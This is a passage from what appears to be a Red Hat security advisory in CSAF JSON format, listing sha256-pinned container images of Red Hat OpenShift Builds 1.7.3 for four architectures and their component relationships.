"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3Af4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9\u0026tag=1780477299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3Ae1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9\u0026tag=1780477295"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9\u0026tag=1780374228"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3Ab2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9\u0026tag=1780374084"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3A18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9\u0026tag=1780373846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3A6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9\u0026tag=1780374151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3Aa2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9\u0026tag=1780373867"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3A54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9\u0026tag=1780373835"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3Ac176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator\u0026tag=1780480839"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3Acbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9\u0026tag=1780477299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3A0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9\u0026tag=1780477295"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9\u0026tag=1780374228"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3A8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9\u0026tag=1780374084"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3A67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9\u0026tag=1780373846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3Acdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9\u0026tag=1780374151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3Abd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9\u0026tag=1780373867"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3A9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9\u0026tag=1780373835"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3A5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator\u0026tag=1780480839"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3Ad1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9\u0026tag=1780477299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3Adce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9\u0026tag=1780477295"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3Ab83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9\u0026tag=1780374228"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3A80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9\u0026tag=1780374084"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3Adfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9\u0026tag=1780373846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3A92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9\u0026tag=1780374151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3A3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9\u0026tag=1780373867"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3Acc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9\u0026tag=1780373835"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3A351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator\u0026tag=1780480839"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3A503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9\u0026tag=1780477299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3Aa406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9\u0026tag=1780477295"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9\u0026tag=1780374228"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3A9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9\u0026tag=1780374084"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x as a component of Red Hat OpenShift Builds 1.7.3",
